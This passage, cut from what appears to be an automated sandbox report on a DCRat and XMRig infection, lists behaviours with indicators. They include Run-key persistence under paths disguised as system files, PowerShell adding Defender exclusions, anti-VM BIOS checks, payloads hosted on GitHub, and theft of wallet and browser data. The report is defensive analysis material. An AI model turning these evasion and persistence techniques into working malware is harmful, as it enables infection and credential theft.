spawn this process 1316 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4328 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1292 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1760 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2848 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1876 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2080 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3372 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 236 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 424 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 784 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5932 3980 schtasks.exe 97 -
resource yara_rule behavioral3/files/0x000400000002aa3f-4.dat dcrat behavioral3/memory/4428-34-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat behavioral3/files/0x000100000002aa9e-57.dat dcrat behavioral3/memory/4944-69-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral3/files/0x000100000002aaa5-84.dat dcrat behavioral3/memory/2188-86-0x0000000000CA0000-0x0000000000E24000-memory.dmp dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral3/memory/5712-3161-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3160-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3166-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3168-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3167-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3165-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3164-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3178-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3181-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3182-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3372-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3382-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/5712-3826-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3112 powershell.exe 4776 powershell.exe 5440 powershell.exe 5720 powershell.exe 336 powershell.exe 420 powershell.exe 2188 powershell.exe 5528 powershell.exe 1176 powershell.exe 3892 powershell.exe 2068 powershell.exe 2200 powershell.exe 2112 powershell.exe 4592 powershell.exe 5380 powershell.exe 5684 powershell.exe 5532 powershell.exe 4972 powershell.exe 4064 powershell.exe 4812 powershell.exe 440 powershell.exe 420 powershell.exe 5004 powershell.exe 5640 powershell.exe 3576 powershell.exe 2276 powershell.exe 1540 powershell.exe 4840 powershell.exe 1876 powershell.exe 2352 powershell.exe 2776 powershell.exe 2352 powershell.exe 5544 powershell.exe 3808 powershell.exe 4796 powershell.exe 2688 powershell.exe 2792 powershell.exe 2892 powershell.exe 956 powershell.exe 3912 powershell.exe 5328 powershell.exe 5392 powershell.exe 1688 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral3/memory/4428-34-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Executes dropped EXE 19 IoCs
pid Process 4944 Result.exe 2344 DCRatBuild.exe 1444 Bloxstrap.exe 4904 Frage build.exe 3976 SolaraBootstrapper.exe 4964 solara.exe 2188 Refcrt.exe 676 Refcrt.exe 3112 ComContainerbrowserRefRuntime.exe 1476 SearchHost.exe 5836 Roblox.exe 6128 ComContainerbrowserRefRuntime.exe 1016 Bloxstrap.exe 1984 msiexec.exe 5132 sihost64.exe 5772 vc_redist.x64.exe 976 vc_redist.x64.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4296 Bloxstrap-v2.5.4.exe -
Loads dropped DLL 17 IoCs
pid Process 3116 MsiExec.exe 3116 MsiExec.exe 4080 MsiExec.exe 4080 MsiExec.exe 4080 MsiExec.exe 4080 MsiExec.exe 4080 MsiExec.exe 5504 MsiExec.exe 5504 MsiExec.exe 5504 MsiExec.exe 3116 MsiExec.exe 976 vc_redist.x64.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/memory/5700-3809-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-3811-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-3812-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-3810-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-3932-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-3993-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-4013-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-4014-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-4042-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral3/memory/5700-4047-0x0000000180000000-0x0000000180B57000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 46 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default User\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\winNet\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\winNet\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Users\\Admin\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\winNet\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\DriversavessessionDlldhcp\\SearchHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Uninstall Information\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default User\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Recovery\\WindowsRE\\unsecapp.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\winNet\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\winNet\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\winNet\\sihost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\winNet\\sihost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Recovery\\WindowsRE\\unsecapp.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\My Documents\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Uninstall Information\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\DriversavessessionDlldhcp\\SearchHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Users\\Admin\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\My Documents\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\winNet\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\csrss.exe\"" Refcrt.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1172 msiexec.exe 6 1172 msiexec.exe 7 1172 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 26 raw.githubusercontent.com 32 raw.githubusercontent.com 44 raw.githubusercontent.com 45 raw.githubusercontent.com 64 raw.githubusercontent.com 70 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com 9 ipinfo.io 15 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC1AFE84F5994A4CC7B7794C40D55BC32D.TMP csc.exe File created \??\c:\Windows\System32\niffs7.exe csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 5700 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5004 set thread context of 5712 5004 conhost.exe 344 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\unique-filename\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-bugs.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\man\cssesc.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\common.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-columns\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-doctor.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\clone\clone.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\node.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\lib\remote.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-team.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\which\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\humanize-ms\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\bin.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\max-listeners.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\subset.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\lib\internal\streams\stream-browser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\lib\internal\streams\pipeline.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-publish.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\ca\verify\chain.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\lib\internal\streams\from.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\adduser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\minimatch\lib\path.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\name-from-folder\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\access.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\relpath.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-core-module\core.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\dep-valid.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\archy\examples\beep.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\events\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\blob.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\clone\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\dependency-selectors.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\workspaces\get-workspaces.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-mans.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\targets.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\pnpm.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\util-deprecate\node.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-repo.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\set-blocking\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ls.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-cache.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\tools\Xcode\Specifications\gyp.xclangspec msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\trap.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\sigstore_trustroot.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmteam\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\agent.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\util\npm.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stars.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-sized\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\validate-npm-package-license\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-bugs.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\event-target-shim\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\infer-owner\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\error.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\is.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\buffer\package.json msiexec.exe -
Drops file in Windows directory 32 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8E6.tmp msiexec.exe File created C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSI31EE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7AC.tmp msiexec.exe File created C:\Windows\SystemTemp\Crashpad\reports\133006b48fb54b Refcrt.exe File opened for modification C:\Windows\Installer\MSI2029.tmp msiexec.exe File created \??\c:\Windows\PrintDialog\Assets\CSCEA7B6E856AE41B3B5E0A1592D23E056.TMP csc.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File created C:\Windows\PrintDialog\Assets\eddb19405b7ce1 Refcrt.exe File created C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe Refcrt.exe File created C:\Windows\Installer\e57ff82.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File created C:\Windows\SystemTemp\~DFB4C95750C59FAC77.TMP msiexec.exe File created \??\c:\Windows\PrintDialog\Assets\backgroundTaskHost.exe csc.exe File created C:\Windows\Installer\e57ff7e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI897.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF7606B227E7BEAA78.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8B4B.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8EF8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI204A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8BC9.tmp msiexec.exe File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI8D70.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFCB18D76AF4CA4C56.TMP msiexec.exe File opened for modification C:\Windows\Installer\e57ff7e.msi msiexec.exe File opened for modification C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSI128C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI31FF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFEF7023939708B605.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 36 IoCs
